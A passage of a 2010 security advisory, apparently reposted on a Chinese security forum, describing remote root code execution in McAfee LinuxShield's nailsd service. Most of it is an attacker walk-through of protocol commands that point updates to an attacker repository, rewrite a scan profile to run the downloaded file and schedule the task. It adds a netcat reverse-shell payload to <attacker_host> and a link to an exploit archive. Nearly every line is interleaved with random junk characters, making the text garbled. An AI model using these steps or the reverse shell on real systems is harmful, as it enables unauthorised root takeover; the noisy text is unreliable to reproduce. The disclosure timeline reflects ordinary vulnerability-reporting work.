    - y+ D' T5 ~: w; v0 B4 @tasks with root privileges.
    4 V* K% J( e$ j1 C1 L% U: D5 l- `2 P
    A direct execution of commands is not possible, but it is possible to/ q* E9 |4 c2 e. d2 O. ~. V
    download and execute code through manipulation of the config and
    3 N0 f; p* ]0 H% L0 J6 F6 `% iexecute schedule tasks of the LinuxShield.
    , q/ U- |+ n! T4 i, N+ v% ^. h- A/ d* k) K5 R# n. ?

    % v: b0 b! |; F9 `7 \walk-through (after the TLS handshake):
    ' x& n$ T( {0 I' G0 v; _+--------------------------------------
    # \# e* p% c- q, m% D, C4 h- T- A1 T* @
    nailsd > +OK welcome to the NAILS Statistics Service5 L& D% b9 z7 F1 W
    attacker> auth <user> <pass>% K, _2 V! C6 p3 \6 H
    nailsd > +OK successful authentication
    1 A) z5 Z# `8 {3 ~, t. s* G/ T9 v/ p& X7 Z6 d: B" V3 L. t2 d' U
    # Set the Attacker repository to download our code from a httpd) E- S. o# K; I" z/ t* r7 |
    # (catalog.z)% [3 M- {6 L5 I/ @- D9 m
    #---------------------------------------------------------------
    * _: T& _. L6 |, R* q( sattacker> db set 1 _table=repository status=1 siteList=<?xml version
      Q$ i5 \; ^3 T0 z: J; t+ c9 R="1.0" encoding="UTF-8"?><ns:SiteLists
    : I# e3 Y7 w' r/ J& M# f6 l' ~xmlns:ns="naSiteLi  N1 ^1 U5 m6 C4 f3 [
    st" GlobalVersion="20030131003110"
    & J4 Y- B9 c: M0 i$ L# BLocalVersion="20091209
    " @) C) W! b) d. Y" ?# j) q8 V8 a161903" Type="Client"><SiteList" g4 F) t; K8 I
    Default="1" Name="SomeGU4 G: ?2 U7 n( X( f1 Y
    ID"><HttpSite Type="repository"
    $ x. {+ B% T/ p3 [Name="EvilRepo" Order="1
    ' d$ r% ~+ n2 V: c1 ?* s" Server="<attackerhost>:80"3 y% J5 F$ e4 Z7 J* u
    Enabled="1" Local="1"><Rela1 I5 g- u& U* g& R) R7 R2 x
    & w5 D! W4 S7 H0 M  q0 m
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    ) }" _4 H* X# x# S7 l$ @- h4 P- _rName></
      _& X4 k% a( n& F  AUserName><Password
    2 }2 q, o1 @4 a# i! wEncrypted="0"/></HttpSite></SiteList></
    & S2 b/ b( Q/ }( zns:SiteLists> _cmd=update( @+ z/ c! ^, ]3 R, G
    nailsd > +OK database changes buffered.7 O  V- V% O" B5 a" _* g

      w( z, O0 k) B; _" m# Execute task to set the attacker repository1 `" Q. X6 B4 P
    #---------------------------------------------------------------
    9 n# y; L7 h6 Q3 r) Xattacker> task setsitelist0 f( w7 `$ P+ O; x
    nailsd > +OK setting sitelist from CMA." Y, t) F+ r) @1 h$ K

    1 F# s+ |+ r8 T* i: K, K! p* ]# Execute the default Update task to download the code9 ~, K; D$ K2 g% O8 ~  W9 |+ c) ?
    #---------------------------------------------------------------
    + x, h5 D; S, t  Pattacker> task nstart LinuxShield Update
    , ?& x; z/ H% F* q& Mnailsd > +OK task LinuxShield Update starting# \1 m' Q& t! k/ u9 J& o( q
    + k+ S0 ^; h4 g2 N! O
    # Create a Scan profile, which executes our code. The profiles are$ @& o+ }8 @% i# F! H
    # not stored in the database.2 n$ Z1 S. V. ^# _4 m- V
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg% E4 k3 ]& m3 f! I, ?! W3 P
    #---------------------------------------------------------------! W" |, b  d" J9 M) \/ L6 A
    attacker> sconf ODS_99 begin
    . w; Z1 g' p! I8 d+ b8 [* d5 inailsd > +OK 1260400888
    9 [- S5 D8 h6 m! B3 r0 S- |/ Y/ `
    ' P9 R  |9 O' K# Set the variable "nailsd.profile.ODS_99.scannerPath" to the* b& W# @! k- q/ P. S& |
    path
    7 W8 s+ q) m; r: S% q- g7 Q# where our earlier downloaded catalog.z file is stored.
    2 w& V) o4 }% e: D8 I5 i! O6 z# D0 Y# (/opt/McAfee/cma/scratch/update/catalog.z)
    / d, ?% W) V! F2 Y7 u# }1 k#---------------------------------------------------------------
    5 I- [. {; i* v, _* Dattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=8 w' P7 b/ _! i; W5 I
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    8 g: P3 }6 ]' N4 d" Q2 wDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    1 F4 I9 c) b8 h# d# X( u10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng9 Q5 U1 i4 [8 C7 i4 Y  Y
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    & h' G. T% |- f" |+ d' Cfile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    5 S! [( P) ?. ]ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en% A  J# U( U) k
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd8 @( |+ ~) b: v6 @9 l' ?
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu+ a, J8 o' W5 U
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru0 E! R) m$ {5 c/ }6 {$ {' i6 s
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99- B/ Q! ?7 w; }, m; C. o
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi% q3 Z3 D0 M- q! g. u; k
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    # c  L) x0 G; z. v1 `dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    . t( t% @( k6 t* T( le nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr2 X  J0 L$ A% }4 s6 s/ {4 a
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    $ H/ u7 q8 f4 c6 X! a" v% M- Yo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    * `6 U# ]( O" l: v/ S.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    0 v1 m+ C( ]# j- g2 S3 |rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    4 S+ |: e: {! X+ G+ [- Z9 L0 Ach/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    + s, B2 m2 A  G$ |1 P  g: G00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.$ L: `6 o, ~- q( o
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil7 C; i8 `$ d! a2 t; T% ]6 Z  z
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    : B4 v, K' S0 G- inailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    " @) k. `% d7 a0 Q" }% Dofile.ODS_99.filter.extensions.type=extension nailsd.profil2 h) c  t' P2 H4 f7 B
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99, ], x8 W1 U6 n
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.) j4 L, p7 R% S
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s. v5 T; D- `- E% Y1 v6 `
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    * y% t8 H/ u6 Z6 w( s' Y* yss nailsd.profile.ODS_99.action.error=Block
    + h* v3 U+ f9 |6 ^1 H* gnailsd > +OK configuration changes buffered, b  e' Q1 A/ ]3 S/ w' `4 }
    attacker> sconf ODS_99 commit 1260400888
    6 A0 B* I' z% p' q, H" A) tnailsd > +OK configuration changes stored
    $ ?" {+ L; i5 T/ N
    9 T$ Z7 Y1 a& z8 }/ y# Set a scan task with the manipulated profile to execute the code
    " x7 p. F/ y9 Z( ~$ _' ]$ L* S9 d#---------------------------------------------------------------5 i+ G4 v1 z& j' e, U' o( Z
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy9 T2 N- G5 r! k7 |4 F
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    2 n5 j( c4 P6 H, L6 F# rmp;exclude:false timetable=type=unscheduled taskResults=0 i
    2 t8 z1 x( M/ Z_lastRun=1260318482 status=Stopped _cmd=insert
    9 n6 z9 u1 V9 E. s6 q5 Znailsd > +OK database changes buffered
    3 O! f, G+ t/ x# z. E" L) a; d+ |, M8 U4 \  J- H* P
    # Execute scan task to execute the code
    5 T. {$ @3 d3 ]#---------------------------------------------------------------+ ~. \3 z5 d% X  R2 e5 p
    attacker> task nstart Evil Task
    0 X) ~, z0 L8 N: ?( T
    4 ~3 U8 l. P- {+-------------------------------------- walk-through EOF) h% K" }6 u: t

    ( S+ ~4 H4 [8 A
    # e8 ~3 J1 G+ }" }$ V( C' kTo get a reverse root shell place something like this in the catalog.z0 m& T3 ?8 i; W: A

    ; [1 F5 [5 W! ^# m: i& K--- snip ---
    ; q& }7 X' m% P3 J1 T# h8 W#!/bin/sh  `* D5 j9 t  h3 W" k
    nc -nv <attacker_host> 4444 -e /bin/sh: C. X# b. K, K0 M0 ]
    --- /snip ---
    . X  K( I' c' g
    4 ~; m* f# v5 k: }% z9 X8 b1 G* F4 v; b" z, k5 J$ B# m6 p

    $ P& D$ d0 W" ]2 f3 Z) ~7 ~  G0 XProof of Concept :8 K. ~7 O  h7 G  n+ k" J2 W& k  l1 K
    ==================* a8 B" p# v+ n9 J4 `1 [1 L2 s
    * x. a2 E$ @/ @' c3 q/ d, d5 X& V. A
    http://inj3ct0r.com/sploits/11165.tar.gz" @3 ?) o! A! {% A9 S2 \

    # ^0 |: O" w$ s1 y- W0 k* a' z7 M. i0 p$ F. V. _( }$ u" W; C
    6 C+ l7 i+ {# D3 ^  L$ W
    Solution:- A" V9 m- }3 S- @' U
    =========
    ; l  d0 w7 q4 Q9 l- Q
      |& ?% _9 t% S: f* U, U0 fMcAfee Advisory- L3 P2 D9 u7 V7 a5 a$ t, b
    +--------------/ P# y9 H( V( r2 y# u7 c" l
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB100070 v2 A! K! f" J% }3 V4 \" L. Z
    3 D$ X) G8 S5 D

    " l; G5 Z+ A+ [- m, G; Y0 I) F; G  q& m
    Disclosure Timeline (YYYY/MM/DD):
    ; o( [. j4 J" x+ H8 {; t=================================
      |5 Z+ x7 |  r0 I( t2 ?5 x" d- v% E4 h# a, R" y
    2009.12.07: Vulnerability found7 e2 c" @  Z5 X0 ~. t* T
    2010.02.03: Asked vendor for a PGP key
    * ^9 w$ y. f4 Y/ J2010.02.05: Vendor sent his PGP key2 ?3 y; o2 o  U0 ?+ E7 E
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure/ U$ I4 A$ _( O7 y( y) w& W
    date (2010.02.18) to Vendor
    0 G0 f% t) y6 d5 @- {2010.02.05: Vendor acknowledges the reception of the advisory
    & B' ^; j' o( K- g9 C2010.02.16: Ask for a status update, because the planned release date is
    * P2 o$ Z% H! a# ~9 F$ t2010.02.18.( O% H- F  ^4 U- j2 o" B8 i5 M
    2010.02.16: Vendor response that, they are currently working on a patch$ O' s  H8 `$ T5 m% r; K
    2010.02.17: Changed release date to 2010.02.25.
    2 N  U% ?7 X# w* u4 b9 _6 [: M2010.02.22: Vendor gives a status update, that they are able to release
    ; J4 m  F& E0 |& wthe patch on 2010.02.25.1 h8 F6 C% ?# V7 r! p* b# s
    2010.02.24: Ask for a list of affected products and the advisory url.% T3 J/ P  J5 [" t0 y7 @: Y
    2010.02.24: Vendor sends the list.
    6 F* O. i3 D/ ?$ `3 D0 \2010.03.02: Release of this Advisory
    ! Z+ r! ]6 [, `' F* s: B' `4 Z5 M; G$ j; p+ Q/ v
    $ M# g$ J& K0 I  o% k' |7 L/ d
    3 Y7 ?' R0 d: ^* r% j% g- ?" L

    0 b. c+ h2 @1 p3 d! i+ B5 C
    $ O( m/ H; n/ t: i9 F8 M, t3 H2 Y0 g0 P8 I; U  N

    ( {+ g( E) o. L$ H1 O/ v" y7 F# Y7 i( e: S+ V/ u
    0 t( D2 p, c% r+ o
    5 A& h% }/ k) v: u0 p

    % Y1 V- e( |& u9 g
    0 q- q+ }) D1 F- \* b. t  b. t
    3 Q) K. x/ t- z* a$ i7 G6 X+ {% _* \

    . ], ?& r* Y5 @3 ?1 Z+ j8 a7 H! W& R% w4 |: n1 o! r
    - K* ~4 W' m$ r" k5 ]

    " s( u; `; J5 Y! t9 w( |! ?/ r- }2 T7 D# \7 A8 h
    $ R8 }  W" X+ Y: S: Y" K- n  I0 ^
    ' @2 R. o, R2 k& C
    公告:https://www.sitedirsec.com公布最新漏洞,请关注




    欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2